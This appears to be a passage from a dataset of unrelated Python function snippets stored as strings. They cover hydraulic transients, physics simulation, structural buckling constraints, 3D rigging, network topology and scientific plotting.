= V0[1]; H2 = H0[1] # downstream node\n dVdx1 = dVdx10 ; dVdx2 = dVdx[0]\n dVdt1 = dVdt10 ; dVdt2 = dVdt[1]\n if utype[0] == 'Pipe':\n if linkp.start_node.transient_node_type == 'SurgeTank':\n shape = linkp.start_node.tank_shape\n H[0], V[0], Qs = surge_tank(shape, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.start_node.water_level = H[0]\n linkp.start_node.tank_flow = Qs\n if linkp.start_node.transient_node_type == 'Chamber':\n shape = linkp.start_node.tank_shape\n H[0], V[0], Qs, zp = air_chamber(shape, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.start_node.water_level = zp\n linkp.start_node.tank_flow = Qs\n\n else:\n elev = linkp.start_node.elevation\n emitter_coeff = linkp.start_node.emitter_coeff + linkp.start_node.demand_coeff\n block_per = linkp.start_node.block_per\n H[0], V[0] = add_leakage(emitter_coeff, block_per,link1, linkp, elev,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif utype[0] == 'Pump':\n pumpc = pump[0]\n H[0], V[0] = pump_node(pumpc, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n elif utype[0] == 'Valve':\n valvec = valve[0]\n H[0], V[0] = valve_node(valvec, link1, linkp,\n H1, V1, H2, V2, dt, g, 0, np.sign(links1), [-1],\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n # Pipe end (outer boundary conditions )\n V1 = V0[n-1]; H1 = H0[n-1]\n dVdx1 = dVdx[n-1]\n dVdt1 = dVdt[n-1]\n if dtype[0] == 'Reservoir' or dtype[0] == 'Tank':\n H[n], V[n] = rev_end (H1, V1, H[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n if dtype[0] == 'Valve':\n H[n], V[n] = valve_end (H1, V1, V[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n if dtype[0] == 'Junction':\n elev = linkp.end_node.elevation\n H[n], V[n] = dead_end (linkp ,H1, V1, elev, n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n\n\n return H, V", "def __init__(self, **kwargs):\n GaussBeam.__init__(self, **kwargs)\n self.scale = kwargs.get('scale',10.)\n self.mass = kwargs.get('mass', 6.0)\n self.s0 = kwargs.get('s0', 7.0)\n self.retro = kwargs.get('retro', 1.0)\n self.alpha = kwargs.get('alpha', 1.0)\n self.Er0 = Erecoil( self.l , self.mass) \n self.mW = 1000 * (self.s0 * self.Er0 ) \\\n * np.abs( np.pi / 8. / uL(self.l) )\\\n * self.w[0]*self.w[1] / self.retro", "def makeBinaryChains():\n\t\n\t# retrieve the binding partner specifications\n\t(maxsize,types) = getTypes()\n\t\n\t# Do some basic argument checking for this model\n\tif (len(types) < 2):\n\t\tprint \"Number of defined types must equal two for binary chain calculations.\"\n\t\treturn\n\tif (maxsize == 0):\n\t\tprint \"Must specify a valid maximum number for one or more components.\"\n\t\treturn\n\n\tallChains = []\n\tnewChainsA = [[]]\n\tnewChainsB = []\n\t\n\ttypeA = types[0]\n\ttypeB = types[1]\n\t\n\t# start the chain with a single type A component\n\taddComponent(newChainsA[0],typeA,0,0)\n\n\tdepth = 0\n\tfor n in range(maxsize):\n\t\tdepth+=1\n\t\t\n\t\t# go through all the chains created last iteration and append B components\n\t\tnewChainsB = []\n\t\tfor thisChain in newChainsA:\n\n\t\t\t# get a list of new available sites in the provided chain\n\t\t\t# by setting depth -1, we will only add to components added last round\n\t\t\topenSites = makeSiteList(thisChain,typeB,depth-1)\n\t\t\t\n\t\t\t# make all the descendants from the current chain and append them to the pool\n\t\t\tif (n == 0) and (typeA['sym']): #if the starting binder is symmetric, no need to start chains at all its sites\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,-1)\n\t\t\telse:\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,depth)\n\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsB))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsB\n\t\t\n\t\tdepth+=1\n\t\t\n\t\t# add an additional component to all the previously modified chains\n\t\tnewChainsA = []\n\t\tfor thisChain in newChainsB:\n\n\t\t\topenSites = makeSiteList(thisChain,typeA,depth-1)\n\t\t\tnewChainsA = newChainsA + fillSites(openSites,thisChain,typeA,depth)\n\t\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsA))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsA\n\n\treturn allChains", "def __init__(self, x_min, x_max, y_min, y_max, bs_number, ue_number,\n layer=1, power=1.0, bs_distribution=\"square_grid\",\n ue_distribution=\"gaussian\", ue_sigma=0,\n if_fix_bs=True,\n bs_radius_1=50,\n grid_l_1=10,\n grid_l_2=10):\n BaseRegion.__init__(self, x_min, x_max, y_min, y_max)\n BaseBS.__init__(self, bs_number, layer, power, bs_distribution, if_fix_bs)\n BaseUE.__init__(self, ue_number, ue_distribution, ue_sigma)\n self.bs_radius_1_ = bs_radius_1\n self.grid_l_1_ = grid_l_1\n self.grid_l_2_ = grid_l_2\n if not if_fix_bs:\n self.set_bs_to_region()\n self.set_ue_to_region()\n self.bs_ue_dict_ = {}\n # a dict that show which ue belong to which bs\n # key: 0, 1, ..., num_bs\n # value: 0, 1, ..., num_ue belong to the key\n self.select_ue()", "def constrain_buckling(self, method=1, ms=0.1):\n self.create_dvars()\n eltype = self.elements[0].type\n\n # reading constants\n dtable_E = self.dtables['STRE'][0]\n dtable_nu = self.dtables['STRnu'][0]\n\n if method == 1 and self.profile.lower() == 'z_t':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n # reading constants\n dtable_b = self.dtables['STRZb'][0]\n dtable_h = self.dtables['STRZh'][0]\n # building DRESP1 that reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id]\n dresp2.dtable = [dtable_b, dtable_h, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'z_t_b':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n dvar_b = self.dvars['STRZb']\n # reading constants\n dtable_h = self.dtables['STRZh'][0]\n # building DRESP1 that reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_b.id]\n dresp2.dtable = [dtable_h, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'z_t_b_h':\n # buckling equation\n deqatn = DEQATN(\n 'bf(t, b, h, E, nu, FA) = b-t/2.;'\n 'bw = h-t;'\n 'x = bf/bw;'\n 'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '\n '+ 249.62*x**2 -41.924*x + 6.4545;'\n 'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'\n 'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRZt']\n dvar_b = self.dvars['STRZb']\n dvar_h = self.dvars['STRZh']\n # building DRESP1 that reads:\n # - axial stress\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n atta = OUTC['STRESS']['CBAR']['Axial']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,\n atta=atta, attb='', atti=eid)\n self.add_dresp(dresp_FA)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_b.id, dvar_h.id]\n dresp2.dtable = [dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_FA.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'b_t':\n # buckling equation\n # - considers combined compression + shear\n # - disconsiders bending effects\n # - assumes 3 edges simply supported and one free unloaded edge\n deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'\n 'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FC = PC/(t*h);'\n 'Rc = FC/FCcr;'\n 'x = L/h;'\n 'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'\n '37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'\n 'ks = MAX(ks, 5.42);'\n 'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FS = PS/(t*h);'\n 'Rs = FS/FScr;'\n 'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRBt']\n # reading constants\n dtable_h = self.dtables['STRBh'][0]\n dtable_L = self.dtables['STRBL'][0]\n # building DRESP1s that read:\n # - axial force\n # - shear along Plane 1 (y axis)\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n code_PC = OUTC['FORCE']['CBAR']['Axial force']\n code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,\n atta=code_PC, attb='', atti=eid)\n dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,\n atta=code_PS, attb='', atti=eid)\n self.add_dresp(dresp_PC)\n self.add_dresp(dresp_PS)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id]\n dresp2.dtable = [dtable_h, dtable_L, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n elif method == 1 and self.profile.lower() == 'b_t_h':\n # buckling equation\n # - considers combined compression + shear\n # - disconsiders bending effects\n # - assumes 3 edges simply supported and one free unloaded edge\n deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'\n 'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FC = PC/(t*h);'\n 'Rc = FC/FCcr;'\n 'x = L/h;'\n 'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'\n '37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'\n 'ks = MAX(ks, 5.42);'\n 'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'\n 'FS = PS/(t*h);'\n 'Rs = FS/FScr;'\n 'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')\n self.add_deqatn(deqatn)\n # reading variables\n dvar_t = self.dvars['STRBt']\n dvar_h = self.dvars['STRBh']\n # reading constants\n dtable_L = self.dtables['STRBL'][0]\n # building DRESP1s that read:\n # - axial force\n # - shear along Plane 1 (y axis)\n OUTC = output_codes_SOL200.OUTC\n if eltype == 'CBAR':\n code_PC = OUTC['FORCE']['CBAR']['Axial force']\n code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']\n else:\n raise NotImplementedError('element %s not implemented' %\n eltype)\n eid = self.get_central_element().eid\n dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,\n atta=code_PC, attb='', atti=eid)\n dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,\n atta=code_PS, attb='', atti=eid)\n self.add_dresp(dresp_PC)\n self.add_dresp(dresp_PS)\n # building DRESP2\n dresp2 = DRESP2('STRBUCK', deqatn.id)\n dresp2.dvars = [dvar_t.id, dvar_h.id]\n dresp2.dtable = [dtable_L, dtable_E, dtable_nu]\n dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]\n self.add_dresp(dresp2)\n # applying constraint\n dcid = self.constraints['buckling']\n dconstr = self.add_constraint(dcid, dresp2, ms, None)\n\n else:\n raise NotImplementedError('Stringer %s profile not supported!' %\n self.profile)", "def stretch_twist_jnts(start_jnt, end_jnt, twist_jnts):\n\n div = 1.0 / (len(twist_jnts)+1)\n for i, joint in enumerate(twist_jnts):\n\n weight = div*(i+1)\n mc.pointConstraint(start_jnt, joint, weight=1.0-weight)\n mc.pointConstraint(end_jnt, joint, weight=weight)", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'F')\n\n from sage.combinat.root_system.weyl_group import WeylGroup\n self._weyl = WeylGroup(['A', kBoundedRing.k, 1])\n\n km = kBoundedRing.km()\n self.module_morphism(self._F_to_m_on_basis,codomain=km).register_as_coercion() # morphism from affine Schur functions to k-bounded-m\n km.module_morphism(self._m_to_F_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-m basis to affine-Schur basis", "def plot_mass_flow(self,\n watershed, \n output, \n title = 'Subbasin Reach Mass Flow Diagram',\n fontsize = 6, \n theight = 0.2, \n l = 8.5, \n w = 11, \n verbose = True, \n overwrite = True,\n ):\n\n if os.path.exists(output) and not overwrite:\n if verbose: print('file %s exists' % output)\n return\n elif verbose: print('generating a mass linkage plot\\n')\n\n fontheight = fontsize / 72.\n rheight = 3 * fontheight\n rwidth = 12 * fontheight\n xgap = fontheight\n ygap = rheight\n awidth = rheight / 4\n aheight = rheight / 3\n\n # set up a sheet to write the image\n\n fig = pyplot.figure(figsize = (w, l))\n\n ax = fig.add_subplot(111, aspect = 'equal')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n t = ax.set_title(title)\n\n # divide the subbasins into rows and put them on the chart\n # start at the bottom to organize the linkages better\n\n rows = [watershed.outlets, ['outlet']]\n\n top = False\n while not top:\n row = []\n for next in rows[0]:\n for subbasin in watershed.updown:\n if watershed.updown[subbasin] == next: row.append(subbasin)\n if len(row) > 0: \n rows.insert(0, row)\n else: \n top = True\n\n # add an inlet box in the row above each inlet\n\n for inlet in watershed.inlets: \n\n i = 0\n while i < len(rows) - 1:\n\n for subbasin in rows[i]:\n\n if subbasin == inlet:\n \n # find the position of the subbasin in the chart\n\n j = rows[i].index(inlet)\n\n if i > 0:\n\n # figure out where the subbasins point\n \n updowns = [watershed.updown[s] for s in rows[i-1]]\n \n # if first or last, add it there in the row above\n\n if j == 0: \n rows[i-1].insert(0, 'inlet')\n elif j == len(rows[i]) - 1: \n rows[i-1].append('inlet')\n else:\n\n # find the place to add in the preceeding row \n\n n = updowns.index(rows[i][j-1]) + 1\n rows[i-1].insert(n, 'inlet')\n\n i += 1\n\n # write the subbasin boxes to the chart\n\n middle = math.ceil(w // (rwidth + xgap)) // 2\n last = 0\n\n # keep track of the bounding box of the plot\n\n xmin, ymin, xmax, ymax = middle, 0, middle, 0\n\n for i in range(len(rows)):\n\n row = rows[i]\n \n y = (ygap + rheight) * i + theight\n\n # figure out which cell to put in the main column\n\n if i == 0:\n main = row[(len(row) - 1) // 2]\n elif i < len(rows) - 1:\n main = watershed.updown[rows[i-1][last]]\n else: main = 'outlet'\n\n start = middle - row.index(main)\n\n if i < len(rows) - 1: next_row = rows[i + 1]\n\n for subbasin in row:\n x = (rwidth + xgap) * (start + row.index(subbasin))\n r = patches.Rectangle((x, y), rwidth, rheight, fill = False)\n\n # adjust the bounding box\n\n if x < xmin: xmin = x\n if x + rwidth > xmax: xmax = x + rwidth\n if y < ymin: ymin = y\n if y + rheight > ymax: ymax = y + rheight\n\n if subbasin != 'outlet': ax.add_patch(r)\n\n b = ax.text(x + rwidth / 2, y + rheight / 2, subbasin,\n horizontalalignment = 'center',\n verticalalignment = 'center')\n\n # draw the arrow\n\n if i < len(rows) - 1:\n\n x1 = x + rwidth / 2\n\n if i < len(rows) - 2 and subbasin != 'inlet':\n next = watershed.updown[subbasin]\n next_start = (middle - \n next_row.index(watershed.updown[main]))\n x2 = ((rwidth + xgap) * \n (next_start + next_row.index(next))\n + rwidth / 2)\n\n elif subbasin == 'inlet':\n next = watershed.inlets[0]\n next_start = (middle - \n next_row.index(watershed.updown[main]))\n\n x2 = ((rwidth + xgap) * \n (next_start + next_row.index(next))\n + rwidth / 2)\n\n else:\n next_start = middle\n x2 = ((rwidth + xgap) * (middle) + rwidth / 2)\n\n a = pyplot.arrow(x1, y + rheight, x2 - x1, ygap, \n head_width = awidth, head_length = aheight,\n fc = 'k', ec = 'k', \n length_includes_head = True)\n ax.add_patch(a)\n\n last = row.index(main)\n i += 1\n \n pad = 0.02\n\n xmin = xmin - (xmax - xmin) * pad\n xmax = xmax + (xmax - xmin) * pad\n ymin = ymin - (ymax - ymin) * pad\n ymax = ymax + (ymax - ymin) * pad\n\n ax.set_xlim(xmin, xmax)\n ax.set_ylim(ymax, ymin)\n pyplot.axis('off')\n pyplot.savefig(output, dpi = 200)\n\n pyplot.clf()\n pyplot.close()", "def greedy_shrink(self):\n while self.single_greedy_shrink_iteration():\n self.run_shrink_pass(\"lower_common_block_offset\")", "def build_links_capacity(self):\n\n links_capacity = {}\n # Iterates all the edges in the topology formed by switches\n for src, dst in self.topo.keep_only_p4switches().edges:\n bw = self.topo.edges[(src, dst)]['bw']\n # add both directions\n links_capacity[(src, dst)] = bw\n links_capacity[(dst, src)] = bw\n\n return links_capacity", "def __bcc_top_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def setup(self):\n self.vert1 = TestVertex(10, \"New AbstractConstrainedVertex 1\")\n self.vert2 = TestVertex(5, \"New AbstractConstrainedVertex 2\")\n self.vert3 = TestVertex(3, \"New AbstractConstrainedVertex 3\")\n self.edge1 = SimpleApplicationEdge(self.vert1, self.vert2,\n None, \"First edge\")\n self.edge2 = SimpleApplicationEdge(self.vert2, self.vert1,\n None, \"Second edge\")\n self.edge3 = SimpleApplicationEdge(self.vert1, self.vert3,\n None, \"Third edge\")\n self.verts = [self.vert1, self.vert2, self.vert3]\n self.edges = [self.edge1, self.edge2, self.edge3]\n self.graph = ApplicationGraph(\"Graph\", self.verts, self.edges)\n\n flops = 1000\n (e, ne, n, w, sw, s) = range(6)\n\n processors = list()\n for i in range(18):\n processors.append(Processor(i, flops))\n\n links = list()\n links.append(Link(0, 0, 0, 0, 1, s, s))\n\n _sdram = SDRAM(128 * (2**20))\n\n links = list()\n\n links.append(Link(0, 0, 0, 1, 1, n, n))\n links.append(Link(0, 1, 1, 1, 0, s, s))\n links.append(Link(1, 1, 2, 0, 0, e, e))\n links.append(Link(1, 0, 3, 0, 1, w, w))\n r = Router(links, False, 100, 1024)\n\n ip = \"192.162.240.253\"\n chips = list()\n for x in range(5):\n for y in range(5):\n chips.append(Chip(x, y, processors, r, _sdram, 0, 0, ip))\n\n self.machine = Machine(chips)\n self.bp = BasicPartitioner()", "def addBP(self, bp, parent=None, joint_end=None):\n\n log.debug('addBP')\n body = ode.Body(self.world)\n mass = ode.Mass()\n if not parent:\n # if this is the root we have an absolute length,\n # root scale is relative to midpoint of min..max\n bp.length = bp.scale*(bpg.BP_MIN_LENGTH+(bpg.BP_MAX_LENGTH-bpg.BP_MIN_LENGTH)/2)\n bp.isRoot = 1\n else:\n # otherwise child scale is relative to parent\n bp.length = parent.length * bp.scale\n bp.isRoot = 0\n # limit the bp length\n bp.length = min(bp.length, bpg.BP_MAX_LENGTH)\n # mass along x axis, with length without caps==bp.length\n # arg 3 means aligned along z-axis - must be same in renderer and Geoms\n mass.setCappedCylinder(CYLINDER_DENSITY, 3, CYLINDER_RADIUS, bp.length)\n # attach mass to body\n body.setMass(mass)\n # create Geom\n # aligned along z-axis by default!!\n geom = ode.GeomCCylinder(self.space, CYLINDER_RADIUS, bp.length)\n self.geoms.append(geom)\n self.geom_contact[geom] = 0\n # remember parent for collison detection\n if not parent:\n geom.parent = None\n else:\n geom.parent = parent.geom\n # attach geom to body\n geom.setBody(body)\n log.debug('created CappedCylinder(radius=%f, len=%f)', CYLINDER_RADIUS, bp.length)\n # assert(not in a loop)\n assert not hasattr(bp, 'geom')\n # ref geom from bodypart (used above to find parent geom)\n bp.geom = geom\n\n # set rotation\n (radians, v) = bp.rotation\n log.debug('radians,v = %f,%s', radians, str(v))\n q = quat(radians, vec3(v))\n rotmat = q.toMat3()\n if parent:\n # rotate relative to parent\n p_r = mat3(parent.geom.getRotation()) # joint_end *\n log.debug('parent rotation = %s', str(p_r))\n rotmat = p_r * rotmat\n geom.setRotation(rotmat.toList(rowmajor=1))\n log.debug('r=%s', str(rotmat))\n geom_axis = rotmat * vec3(0, 0, 1)\n log.debug('set geom axis to %s', str(geom_axis))\n (x, y, z) = geom.getBody().getRelPointPos((0, 0, bp.length/2.0))\n log.debug('real position of joint is %f,%f,%f', x, y, z)\n # set position\n if not parent:\n # root - initially located at 0,0,0\n # (once the model is constructed we translate it until all\n # bodies have z>0)\n geom.setPosition((0, 0, 0))\n log.debug('set root geom x,y,z = 0,0,0')\n else:\n # child - located relative to the parent. from the\n # parents position move along their axis of orientation to\n # the joint position, then pick a random angle within the\n # joint limits, move along that vector by half the length\n # of the child cylinder, and we have the position of the\n # child.\n # vector from parent xyz is half of parent length along\n # +/- x axis rotated by r\n p_v = vec3(parent.geom.getPosition())\n p_r = mat3(parent.geom.getRotation())\n p_hl = parent.geom.getParams()[1]/2.0 # half len of par\n j_v = p_v + p_r * vec3(0, 0, p_hl*joint_end) # joint vector\n # rotation is relative to parent\n c_v = j_v + rotmat * vec3(0, 0, bp.length/2.0)\n geom.setPosition(tuple(c_v))\n log.debug('set geom x,y,z = %f,%f,%f', c_v[0], c_v[1], c_v[2])\n\n jointclass = { 'hinge':ode.HingeJoint,\n 'universal':ode.UniversalJoint,\n 'ball':ode.BallJoint }\n j = jointclass[bp.joint](self.world)\n\n self.joints.append(j)\n # attach bodies to joint\n j.attach(parent.geom.getBody(), body)\n # set joint position\n j.setAnchor(j_v)\n geom.parent_joint = j\n\n # create motor and attach to this geom\n motor = Motor(self.world, None)\n motor.setJoint(j)\n self.joints.append(motor)\n bp.motor = motor\n geom.motor = motor\n motor.attach(parent.geom.getBody(), body)\n motor.setMode(ode.AMotorEuler)\n\n if bp.joint == 'hinge':\n # we have 3 points - parent body, joint, child body\n # find the normal to these points\n # (hinge only has 1 valid axis!)\n try:\n axis1 = ((j_v-p_v).cross(j_v-c_v)).normalize()\n except ZeroDivisionError:\n v = (j_v-p_v).cross(j_v-c_v)\n v.z = 1**-10\n axis1 = v.normalize()\n log.debug('setting hinge joint axis to %s', axis1)\n log.debug('hinge axis = %s', j.getAxis())\n axis_inv = rotmat.inverse()*axis1\n axis2 = vec3((0, 0, 1)).cross(axis_inv)\n log.debug('hinge axis2 = %s', axis2)\n j.setAxis(tuple(axis1))\n # some anomaly here.. if we change the order of axis2 and axis1,\n # it should make no difference. instead there appears to be an\n # instability when the angle switches from -pi to +pi\n # so.. use parameter3 to control the hinge\n # (maybe this is only a problem in the test case with perfect axis alignment?)\n motor.setAxes(axis2, rotmat*axis1)\n elif bp.joint == 'universal':\n # bp.axis1/2 is relative to bp rotation, so rotate axes\n axis1 = rotmat * vec3(bp.axis1)\n axis2 = rotmat * vec3((0,0,1)).cross(vec3(bp.axis1))\n j.setAxis1(tuple(axis1))\n j.setAxis2(tuple(axis2))\n motor.setAxes(axis1, axis2)\n elif bp.joint == 'ball':\n axis1 = rotmat * vec3(bp.axis1)\n axis2 = rotmat * vec3((0,0,1)).cross(vec3(bp.axis1))\n motor.setAxes(axis1, axis2)\n\n log.debug('created joint with parent at %f,%f,%f', j_v[0], j_v[1], j_v[2])\n\n # recurse on children\n geom.child_joint_ends = set([ e.joint_end for e in bp.edges ])\n geom.parent_joint_end = joint_end\n if joint_end == None:\n # root\n if -1 in geom.child_joint_ends:\n geom.left = 'internal'\n else:\n geom.left = 'external'\n if 1 in geom.child_joint_ends:\n geom.right = 'internal'\n else:\n geom.right = 'external'\n else:\n # not root\n geom.left = 'internal'\n if 1 in geom.child_joint_ends:\n geom.right = 'internal'\n else:\n geom.right = 'external'\n\n for e in bp.edges:\n self.addBP(e.child, bp, e.joint_end)", "def other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def build_rig(self):\n\n\n # create rig part top nodes\n self.create_part_master()\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n anim_ctrls = self.anim_ctrls # Anim controls in this part\n bind_joints = self.bind_joints # Bind joints in this rig part\n world_scale_attr = self.hooks[0]+'.worldScale' # World scale multiplier (Each hooks has it's own world scale)\n hooks = self.hooks # A hook grp is created per hook attribute.\n ctrl_grps = self.ctrl_grps # A ctrl group is created per hook. Parent controls here.\n jnt_grps = self.jnt_grps # A joint groupd is created per hook. Parent joints here.\n noxform_grp = self.noxform_grp # No scale, no transform group for this rig part.\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n pickWalk_parent = options.get('pickWalkParent')\n\n world_grp = hooks[0]\n steering_grp = hooks[3]\n\n mc.addAttr(steering_grp, 